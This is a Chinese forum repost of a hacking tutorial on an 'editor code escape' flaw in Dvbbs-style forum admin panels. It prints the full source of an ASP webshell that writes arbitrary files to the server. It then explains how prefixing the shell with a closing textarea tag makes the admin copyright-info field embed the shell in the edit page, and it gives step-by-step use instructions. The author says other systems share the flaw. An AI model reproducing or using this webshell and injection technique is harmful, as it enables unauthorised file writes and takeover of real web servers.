• 设为首页
  • 收藏本站
  • 积分充值
  • VIP赞助
  • 手机版
  • 微博
  • 微信
    微信公众号 添加方式:
    1:搜索微信号(888888
    2:扫描左侧二维码
  • 登录 立即注册
    • 切换风格
    快捷导航
    福建二哥 门户 查看主题

    编辑器代码逃逸漏洞 by蚊虫原创

    发布者: 荣9319 | 发布时间: 2025-6-27 16:30| 查看数: 42| 评论数: 0|帖子模式

    好 版权信息 把他变成小马


















    成功保存

    但是没有被执行..
    应该是马的问题


    马儿不行 当然是更换了 这不 怪事出现了 你看..

    看 命令成功完成! 非法操作!       这这么跑出来了?????????????
    真是怪了难道我的马儿真的长褪了?

    研究了一下中以明白是怎么回事了..

    看看我的马儿的代码,注意红色的标记
    <body>
    <form method=post>
    <input type=text name=syfdpath value="<%=replace(server.mappath(Request.ServerVariables("SCRIPT_NAME")),".","sb.") %>" size="53">
    <input type=submit value=保存>   蚊虫专用
    <textarea name=cyfddata rows="11" cols="90"></textarea>
    <%
    dim objFSO
    dim fdat
    dim objCountFile
    on error resume next
    Set objFSO = Server.CreateObject("Scripting.FileSystemObject")
    if Trim(request("syfdpath"))<>"" then
    fdata = request("cyfddata")
    Set objCountFile=objFSO.CreateTextFile(request("syfdpath"),True)
    objCountFile.Write fdata
    if err =0 then %>
    <p>命令成功完成!
    <% else %>
    非法操作!
    <%
    end if
    err.clear
    end if
    objCountFile.Close
    Set objCountFile=Nothing
    Set objFSO = Nothing
    %>
    </form>

    再看看网页的源代码,注意橙色的标记
    <td width="50%" class="td1"> <U>论坛版权信息</U></td>
    <td width="50%" class="td1" valign=top>
    <textarea name="Copyright" cols="50" rows="5" id=TdCopyright>
    <style>
    body{
    FILTER:progidXImageTransform.Microsoft.Gradient(gradientType=0,startColorStr=#808080,endColorStr=#000);
    color:#FFF;
    font-size:9pt
    }
    </style>
    <body>
    <p> </p>
    <p> </p>
    <form method=post>
    <input type=text name=syfdpath value="<%=replace(server.mappath(Request.ServerVariables("SCRIPT_NAME")),".","sb.") %>" size="53">
    <input type=submit value=保存>   蚊虫专用
    <textarea name=cyfddata rows="11" cols="90"></textarea>
    <%
    dim objFSO
    dim fdat
    dim objCountFile
    on error resume next
    Set objFSO = Server.CreateObject("Scripting.FileSystemObject")
    if Trim(request("syfdpath"))<>"" then
    fdata = request("cyfddata")
    Set objCountFile=objFSO.CreateTextFile(request("syfdpath"),True)
    objCountFile.Write fdata
    if err =0 then %>
    <p>命令成功完成!
    <% else %>
    非法操作!
    <%
    end if
    err.clear
    end if
    objCountFile.Close
    Set objCountFile=Nothing
    Set objFSO = Nothing
    %>
    </form></textarea>
    <a href="javascript:admin_Size(-5,'TdCopyright')">
    看不明白?
    我来解释一下
    看网页的源代码
    <textarea name="Copyright" cols="50" rows="5" id=TdCopyright>
    这是文本框的开头标记
    尔我的小马里面又有一个文本框结束的标记
    <textarea name=cyfddata rows="11" cols="90"></textarea>
    所以浏览器就把
    </textarea>以下的代码解释为文本框以外的位置了...
    呵呵 这就相当于把 </textarea>以下的代码 写进了这个编辑页面里面...
    明白了吧
    这对我们很有用处
    使用
    在小马最上面加上</textarea>
    保存
    然后重新编辑
    这时 我们的小马已经被'写入"编辑页面

    剩下的就不用说了吧.....哈哈 淫荡去咯....

    ps:不光是动网 还有其他的系统都有类似的漏洞
    ps:不要吧思维光死停留在这里..想想我们可以.....
    PS:有可能运行不了,这取决于你的马.

    来源:https://www.jb51.net/hack/21290.html
    免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!

    本帖子中包含更多资源

    您需要 登录 才可以下载或查看,没有账号?立即注册

    ×

    最新评论

    新人须知

    常见问题

    维权申诉

    关注微博

    扫描微信

    关于合作

    通讯联系

    QQ Archiver 手机版 小黑屋 福建二哥 ( 闽ICP备2022004717号|闽公网安备35052402000345号 )

    Powered by Discuz! X3.5 © 2001-2023

    快速回复 返回顶部 返回列表